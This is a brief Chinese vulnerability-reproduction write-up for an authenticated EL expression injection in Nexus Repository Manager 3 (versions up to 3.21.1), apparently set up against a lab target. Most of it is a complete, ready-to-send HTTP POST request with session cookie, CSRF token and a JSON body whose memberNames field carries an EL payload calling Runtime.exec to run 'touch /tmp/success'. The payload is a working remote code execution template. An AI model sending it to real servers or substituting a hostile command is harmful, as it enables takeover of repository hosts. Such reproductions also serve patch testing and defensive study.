漏洞复现
Nexus Repository Manager 3的3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,该漏洞需要至少普通用户身份,所以我们需要登陆后台。
登录后,复制当前Cookie和CSRF Token,修改以下数据包并发送就能够执行touch /tmp/success
命令:
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: your_ip:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.2746804831498252
Content-Type: application/json
Accept: */*
Origin: http://your_ip:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://your_ip:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.2746804831498252; NXSESSIONID=b730b435-025a-4eb2-9bc0-96930dfc21e9
Connection: close
{
"name": "internal",
"online": true,
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": true
},
"group": {
"memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]
}
}
返回靶机查看